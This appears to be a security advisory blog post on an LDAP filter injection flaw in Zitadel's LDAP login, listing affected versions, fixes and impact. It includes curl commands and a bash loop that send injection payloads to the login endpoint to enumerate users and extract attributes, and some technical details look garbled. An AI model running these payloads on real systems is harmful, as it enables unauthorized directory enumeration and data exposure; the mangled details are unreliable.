Listen to this Post
How the mentioned CVE works:
The vulnerability exists in Zitadel’s LDAP identity provider implementation where user-supplied usernames are not properly escaped before being inserted into LDAP search filters. An unauthenticated attacker can inject LDAP metacharacters such as , (, or ) during the login process. The application constructs an LDAP filter string like “(uid={username})” without sanitizing the input. By sending a username like “)(uid=”, the filter becomes “(uid=)(uid=)” which changes the logical structure. The LDAP server processes the injected filter, causing different responses based on whether a user exists or an attribute matches. This allows blind LDAP injection where the attacker observes success/failure or error messages. While authentication bypass is not possible, the attacker can enumerate valid usernames by testing filter conditions. For example, injecting “(cn=admin)” reveals if that entry exists. Additionally, sensitive attribute data can be extracted using boolean conditions and timing or response differences. The flaw affects versions 2.71.11-2.71.19, 3.1.0-3.4.9, and 4.0.0-4.14.0 including RCs. The patch adds proper escaping and permission checks for email/phone self-management.
dailycve form:
Platform: Zitadel
Version: 2.71.11-4.14.0
Vulnerability: LDAP filter injection
Severity: Medium
date: 2026-05-08
Prediction: Patch already released
Analytics under What Undercode Say:
Check if LDAP injection is possible (blind test)
curl -X POST https://target.zitadel/login/ldap \
-d "username=)(uid=&password=anything" \
-v 2>&1 | grep -i "error|success"
Enumerate users using LDAP injection payloads
for user in admin alice bob; do
payload=")(uid=${user}"
response=$(curl -s -o /dev/null -w "%{http_code}" -d "username=${payload}" -d "password=x" https://target.zitadel/login/ldap)
[ "$response" -eq 200 ] && echo "User $user exists"
done
Extract attribute (e.g., mail) via boolean injection
payload=")([email protected]"
curl -d "username=${payload}" -d "password=x" https://target.zitadel/login/ldap
Exploit:
Send unauthenticated POST requests to the LDAP login endpoint with username containing `)(uid=` or `)(cn=admin` etc. Observe HTTP status codes or error messages that differ between valid and invalid entries. Use binary search on character sets to retrieve full LDAP attributes (blind injection).
Protection from this CVE:
Upgrade to patched version (2.71.20+, 3.4.10+, 4.14.1+). If upgrade impossible, enforce strict LDAP access controls and disable anonymous binds. Sanitize all user inputs by escaping ` ( ) \ NUL` before insertion into LDAP filters. Use parameterized LDAP queries (e.g., `ldap.EscapeFilter()` in Go).
Impact:
Information disclosure allowing enumeration of valid usernames and extraction of sensitive LDAP attributes (e.g., email, department, employee IDs). No authentication bypass. Attacker can map internal directory structure for further attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
